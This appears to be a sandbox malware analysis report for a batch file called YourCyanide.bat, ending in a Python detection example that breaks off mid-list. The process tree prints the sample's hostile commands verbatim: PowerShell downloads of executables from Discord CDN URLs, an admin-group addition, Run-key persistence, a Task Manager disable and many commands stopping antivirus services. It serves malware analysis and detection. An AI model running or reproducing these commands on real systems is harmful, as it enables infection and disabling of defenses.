Analysis
max time kernel: 433s
max time network: 435s
platform: windows7_x64
resource: win7-20220414-en
submitted: 22-05-2022 23:26

Static task: static1
Behavioral task: behavioral1
  Sample: YourCyanide.bat
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: YourCyanide.bat
  Resource: win10v2004-20220414-en
Behavioral task: behavioral3
  Sample: YourCyanide.bat
  Resource: win11-20220223-en
General
Target: YourCyanide.bat
Size: 150KB
MD5: fdd17cbaa7423d1c9ca1ffb376d30b36
SHA1: 47986c795d7a2521408f4f63a6b068c054659bc7
SHA256: 6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725
SHA512: 3aa57c435f462bea43ba87d527603ceabedff24c1353e64dc9b6e2c89956d2216030030e14056095afb4db17eb44f6f33dbed95054d5852cd9a4eccb5d6088cf
Malware Config
Extracted: https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe
Extracted: https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe
Extracted: C:\Users\Admin\Desktop\YcynNote.txt
  yourcyanide.help@gmail.com
Signatures
Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
Blocklisted process makes network request (2 IoCs)
  flow 4  pid 912  powershell.exe
  flow 6  pid 580  powershell.exe
Disables Task Manager via registry modification
Downloads MZ/PE file
Executes dropped EXE (2 IoCs)
  pid 2016  NoKeyB.exe
  pid 1632  GetToken.exe
Modifies Windows Firewall (1 TTPs)
Loads dropped DLL (1 IoCs)
  pid 948  cmd.exe
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles (1 TTPs, 5 IoCs)
  Key queried  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  OUTLOOK.EXE
  Key opened  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  OUTLOOK.EXE
  Key created  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  OUTLOOK.EXE
  Key queried  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  OUTLOOK.EXE
  Key created  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  OUTLOOK.EXE
Adds Run key to start application (2 TTPs, 2 IoCs)
  Key created  \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_25967_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.bat"  reg.exe
Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by cmd.exe: \??\A: \??\I: \??\M: \??\T: \??\Y: \??\B: \??\E: \??\Q: \??\S: \??\W: \??\Z: \??\H: \??\K: \??\L: \??\P: \??\F: \??\G: \??\J: \??\N: \??\O: \??\R: \??\U: \??\V: \??\X:
Drops file in System32 directory (14 IoCs)
  File opened for modification  C:\Windows\SysWOW64\PerfStringBackup.INI  OUTLOOK.EXE
  File created  C:\Windows\system32\perfc007.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfc009.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfc00C.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfc010.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfh010.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfc011.dat  OUTLOOK.EXE
  File created  C:\Windows\SysWOW64\PerfStringBackup.TMP  OUTLOOK.EXE
  File created  C:\Windows\system32\perfh009.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfh00A.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfh00C.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfh007.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfc00A.dat  OUTLOOK.EXE
  File created  C:\Windows\system32\perfh011.dat  OUTLOOK.EXE
Drops file in Windows directory (5 IoCs)
  File opened for modification  C:\Windows\win.ini  cmd.exe
  File opened for modification  C:\Windows\system.ini  cmd.exe
  File created  C:\Windows\inf\Outlook\outlperf.h  OUTLOOK.EXE
  File opened for modification  C:\Windows\inf\Outlook\outlperf.h  OUTLOOK.EXE
  File created  C:\Windows\inf\Outlook\0009\outlperf.ini  OUTLOOK.EXE
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Enumerates processes with tasklist (1 TTPs, 1 IoCs)
Processes:
  Set value (str)  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"  OUTLOOK.EXE
  Key created  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar  OUTLOOK.EXE
  Key created  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt  OUTLOOK.EXE
  Key created  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote  OUTLOOK.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"  OUTLOOK.EXE
  Set value (int)  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"  OUTLOOK.EXE
  Key created  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel  OUTLOOK.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"  OUTLOOK.EXE
  Set value (int)  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"  OUTLOOK.EXE
Modifies registry class (64 IoCs)
NTFS ADS (2 IoCs)
  File opened for modification  C:\Users\Admin\Documents\%c¼├XV:~30  cmd.exe
  File opened for modification  C:\Users\Admin\Desktop\%c¼├XV:~23  cmd.exe
Runs net.exe
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid 1488  OUTLOOK.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid 1632  GetToken.exe
Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid 912  powershell.exe
  pid 1812  powershell.exe
  pid 1812  powershell.exe
  pid 580  powershell.exe
  pid 1324  powershell.exe
  pid 1736  powershell.exe
  pid 1716  powershell.exe
  pid 1532  powershell.exe
  pid 1632  powershell.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid 1488  OUTLOOK.EXE
Suspicious use of AdjustPrivilegeToken (9 IoCs)
  Token: SeDebugPrivilege  pid 912  powershell.exe
  Token: SeDebugPrivilege  pid 1812  powershell.exe
  Token: SeDebugPrivilege  pid 580  powershell.exe
  Token: SeDebugPrivilege  pid 1324  powershell.exe
  Token: SeDebugPrivilege  pid 1736  powershell.exe
  Token: SeDebugPrivilege  pid 1716  powershell.exe
  Token: SeDebugPrivilege  pid 1532  powershell.exe
  Token: SeDebugPrivilege  pid 1696  tasklist.exe
  Token: SeDebugPrivilege  pid 1632  powershell.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
  pid 2016  NoKeyB.exe
  pid 1488  OUTLOOK.EXE (3 hits)
Suspicious use of SendNotifyMessage (3 IoCs)
  pid 2016  NoKeyB.exe
  pid 1488  OUTLOOK.EXE (2 hits)
Suspicious use of SetWindowsHookEx (3 IoCs)
  pid 2016  NoKeyB.exe
  pid 1488  OUTLOOK.EXE
  pid 1632  powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  source pid/process -> target pid/process (each write was logged three times unless noted)
  948 cmd.exe -> 1528 attrib.exe
  948 cmd.exe -> 964 rundll32.exe
  948 cmd.exe -> 912 powershell.exe
  948 cmd.exe -> 2016 NoKeyB.exe
  948 cmd.exe -> 1812 powershell.exe
  948 cmd.exe -> 1880 net.exe
  1880 net.exe -> 612 net1.exe
  948 cmd.exe -> 1512 reg.exe
  948 cmd.exe -> 1308 reg.exe
  948 cmd.exe -> 840 net.exe
  840 net.exe -> 1548 net1.exe
  948 cmd.exe -> 576 net.exe
  576 net.exe -> 1624 net1.exe
  948 cmd.exe -> 1740 net.exe
  1740 net.exe -> 1116 net1.exe
  948 cmd.exe -> 1884 net.exe
  1884 net.exe -> 1072 net1.exe
  948 cmd.exe -> 832 net.exe
  832 net.exe -> 1180 net1.exe
  948 cmd.exe -> 1064 net.exe
  1064 net.exe -> 1584 net1.exe
  948 cmd.exe -> 1900 net.exe (1 hit; list cut off at the 64-IoC limit)
Views/modifies file attributes (1 TTPs, 1 IoCs)
outlook_win_path (1 IoCs)
  Key queried  \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  OUTLOOK.EXE
Processes
Process tree: [depth] image path | command line, followed by the signatures hit by that process.

[1] C:\Windows\system32\cmd.exe | cmd /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat"
    - Loads dropped DLL
    - Enumerates connected drives
    - Drops file in Windows directory
    - NTFS ADS
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\attrib.exe | attrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat
      - Views/modifies file attributes
  [2] C:\Windows\system32\rundll32.exe | RUNDLL32 USER32.DLL SwapMouseButton
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\Documents\NoKeyB.exe | NoKeyB.exe
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -command "Set-ExecutionPolicy Unrestricted"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\net.exe | net localgroup administrators session /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 localgroup administrators session /ADD
  [2] C:\Windows\system32\reg.exe | reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_25967_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat /f
      - Adds Run key to start application
  [2] C:\Windows\system32\reg.exe | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  [2] C:\Windows\system32\net.exe | net stop "Security Center" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Security Center" /y
  [2] C:\Windows\system32\net.exe | net stop "Automatic Updates" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Automatic Updates" /y
  [2] C:\Windows\system32\net.exe | net stop "Symantec Core LC" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Symantec Core LC" /y
  [2] C:\Windows\system32\net.exe | net stop "SAVScan" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SAVScan" /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Firewall Monitor Service" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Auto-Protect Service" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop spoolnt
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Auto Protect Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
  [2] C:\Windows\system32\net.exe | net stop "McAfee Spamkiller Server" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
  [2] C:\Windows\system32\net.exe | net stop "McAfee Personal Firewall Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
  [2] C:\Windows\system32\net.exe | net stop "McAfee SecurityCenter Update Manager" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
  [2] C:\Windows\system32\net.exe | net stop "Symantec SPBBCSvc" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
  [2] C:\Windows\system32\net.exe | net stop "Ahnlab Task Scheduler" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
  [2] C:\Windows\system32\net.exe | net stop navapsvc /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop navapsvc /y
  [2] C:\Windows\system32\net.exe | net stop "Sygate Personal Firewall Pro" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
  [2] C:\Windows\system32\net.exe | net stop vrmonsvc /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop vrmonsvc /y
  [2] C:\Windows\system32\net.exe | net stop MonSvcNT /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MonSvcNT /y
  [2] C:\Windows\system32\net.exe | net stop SAVScan /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SAVScan /y
  [2] C:\Windows\system32\net.exe | net stop NProtectService /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop NProtectService /y
  [2] C:\Windows\system32\net.exe | net stop ccSetMGR /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ccSetMGR /y
  [2] C:\Windows\system32\net.exe | net stop ccEvtMGR /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ccEvtMGR /y
  [2] C:\Windows\system32\net.exe | net stop srservice /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop srservice /y
  [2] C:\Windows\system32\net.exe | net stop "Symantec Network Drivers Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
  [2] C:\Windows\system32\net.exe | net stop "norton Unerase Protection" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton Unerase Protection" /y
  [2] C:\Windows\system32\net.exe | net stop MskService /y
  [2] C:\Windows\system32\net.exe | net stop MpfService /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MpfService /y
  [2] C:\Windows\system32\net.exe | net stop mcupdmgr.exe /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop mcupdmgr.exe /y
  [2] C:\Windows\system32\net.exe | net stop "McAfeeAntiSpyware" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
  [2] C:\Windows\system32\net.exe | net stop helpsvc /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop helpsvc /y
  [2] C:\Windows\system32\net.exe | net stop ERSvc /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ERSvc /y
  [2] C:\Windows\system32\net.exe | net stop "*norton*" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "*norton*" /y
  [2] C:\Windows\system32\net.exe | net stop "*Symantec*" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "*Symantec*" /y
  [2] C:\Windows\system32\net.exe | net stop "*McAfee*" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "*McAfee*" /y
  [2] C:\Windows\system32\net.exe | net stop ccPwdSvc /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ccPwdSvc /y
  [2] C:\Windows\system32\net.exe | net stop "Symantec Core LC" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Symantec Core LC" /y
  [2] C:\Windows\system32\net.exe | net stop navapsvc /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop navapsvc /y
  [2] C:\Windows\system32\net.exe | net stop "Serv-U" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Serv-U" /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Auto Protect Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Client" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
  [2] C:\Windows\system32\net.exe | net stop "Symantec AntiVirus Client" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Server" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
  [2] C:\Windows\system32\net.exe | net stop "NAV Alert" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NAV Alert" /y
  [2] C:\Windows\system32\net.exe | net stop "Nav Auto-Protect" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
  [2] C:\Windows\system32\net.exe | net stop "McShield" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McShield" /y
  [2] C:\Windows\system32\net.exe | net stop "DefWatch" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "DefWatch" /y
  [2] C:\Windows\system32\net.exe | net stop eventlog /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop eventlog /y
  [2] C:\Windows\system32\net.exe | net stop InoRPC /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop InoRPC /y
  [2] C:\Windows\system32\net.exe | net stop InoRT /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop InoRT /y
  [2] C:\Windows\system32\net.exe | net stop InoTask /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop InoTask /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Auto Protect Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Client" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
  [2] C:\Windows\system32\net.exe | net stop "norton AntiVirus Corporate Edition" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
  [2] C:\Windows\system32\net.exe | net stop "ViRobot Professional Monitoring" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
  [2] C:\Windows\system32\net.exe | net stop "PC-cillin Personal Firewall" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
  [2] C:\Windows\system32\net.exe | net stop "Trend Micro Proxy Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
  [2] C:\Windows\system32\net.exe | net stop "Trend NT Realtime Service" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
  [2] C:\Windows\system32\net.exe | net stop "McAfee.com McShield" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfee.com McShield" /y
  [2] C:\Windows\system32\net.exe | net stop "McAfee.com VirusScan Online Realtime Engine" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
  [2] C:\Windows\system32\net.exe | net stop "SyGateService" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SyGateService" /y
  [2] C:\Windows\system32\net.exe | net stop "Sygate Personal Firewall Pro" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
  [2] C:\Windows\system32\net.exe | net stop "Sophos Anti-Virus" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
  [2] C:\Windows\system32\net.exe | net stop "Sophos Anti-Virus Network" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
  [2] C:\Windows\system32\net.exe | net stop "eTrust Antivirus Job Server" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
  [2] C:\Windows\system32\net.exe | net stop "eTrust Antivirus Realtime Server" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
  [2] C:\Windows\system32\net.exe | net stop "Sygate Personal Firewall Pro" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
  [2] C:\Windows\system32\net.exe | net stop "eTrust Antivirus RPC Server" /y
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
  [2] C:\Windows\system32\net.exe | net stop netsvcs
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop netsvcs
  [2] C:\Windows\system32\net.exe | net stop spoolnt
  [2] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
  [2] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
  [2] C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
  [2] C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk1usb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk2usb.cmd2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\loveletter.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\mail.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe', 'GetToken.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\Documents\apps.txt"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\GetToken.exeGetToken.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Get-ComputerInfo"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-ComputerInfo"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y1⤵
-
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding1⤵
- Accesses Microsoft Outlook profiles
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- outlook_win_path
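The command lines in the process tree above are the detection material in this report: a burst of `net stop` / `net1 stop` against security-product service names (and against `eventlog`), `netsh advfirewall` allow rules whose `localport=` is empty (the batch file apparently expanded an unset variable; an empty value is not a valid port list, so the rule most likely was never created, but the attempt is still the signal), PowerShell download cradles pulling from cdn.discordapp.com, and `Out-Printer` applied to the dropped note. The Python below is an added example written for this page, not code from the sandbox or from the sample: it classifies a constructed set of command lines copied from the tree into those behaviors, so the same logic can be pointed at Sysmon event 1 or Security event 4688 command-line fields. The service-name list is a subset taken from the tree; the tag names, thresholds and scoring are assumptions of the example.

```python
import re
from collections import defaultdict

# Constructed input: command lines copied from the sandbox process tree above.
# Image paths are omitted; only the command-line field is classified.
PROCESS_TREE = [
    r'net stop "McAfee.com McShield" /y',
    r'C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y',
    r'net stop eventlog /y',
    r'net stop spoolnt',
    r'netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=',
    "powershell -Command \"(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe', 'GetToken.exe')\"",
    r'powershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"',
    r'powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"',
    r'tasklist',
]

# Security-product service names seen in the tree (lower-cased; a subset of the sample's list).
SECURITY_SERVICES = {
    "mcshield", "defwatch", "inorpc", "inort", "inotask",
    "norton antivirus auto protect service", "norton antivirus client",
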